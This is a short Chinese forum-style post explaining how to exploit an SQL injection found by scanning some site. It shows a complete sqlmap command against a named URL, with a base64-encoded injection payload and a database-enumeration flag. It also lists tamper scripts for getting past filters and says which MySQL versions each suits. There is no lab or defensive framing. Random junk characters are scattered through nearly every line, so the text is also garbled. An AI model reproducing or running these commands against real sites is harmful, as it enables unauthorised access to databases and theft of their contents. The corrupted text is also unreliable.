WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
4 Y! m& H+ p( o& w# j, J0 _$ s) Y; P( `& y- a2 N1 ]% z' E1 P6 v
sqlmap的tamper里有个base64encode.py* ^7 M" E& s, a1 Y1 P2 Q& c: o
- [$ |* `4 m5 y. z+ U/ e7 [
使用如下" I% b( H7 \2 C% w
4 g5 u, D s3 {sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs- A5 c; R2 }. ^& B- L. i" D |; y
9 q, ]0 r8 u5 r3 G
% E& }& _$ x8 q- b: v+ Fsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
0 F) c# e; g, y5 L- V
, T7 q7 h ]7 V其中常用到的bypass脚本绕过SQLMAP主要两个脚本:( z3 J* r2 A- z1 P
1 L( R$ U2 ^- a# N1 c+ H+ espace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
. X8 ^9 M) E: N7 Q9 V* Vspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入1 ]- E+ P. Q( Q
首先确定目标数据库版本,然后选择相应的脚本。
7 B0 E# A' K9 n$ S1 c. \8 ~-v 3 --batch --tamper "space2hash.py"
! h" J# o0 n4 d' t; e* T
6 m3 n. V7 @/ O7 P还有其他一些插件: s, ?( r2 E8 c2 Q8 V, W" ~
encodes编码 ——charencode.py7 v* f( ~, h& m$ G: J7 O
base64编码 —— base64encode.py
" I. B U7 E3 G# a" {% F1 g$ V替换空格和关键字 —— halfversionedmorekeywords.py3 \( n- f+ \5 ^/ e' \
| 7 R, X4 |3 _3 U! N' ~) m
/ g1 O! E5 i; c, q0 [6 Z+ E5 t M
% k3 |/ p- Y1 [. o( i& Z, U! j1 }. \' y7 g: B; }# H; k$ V
|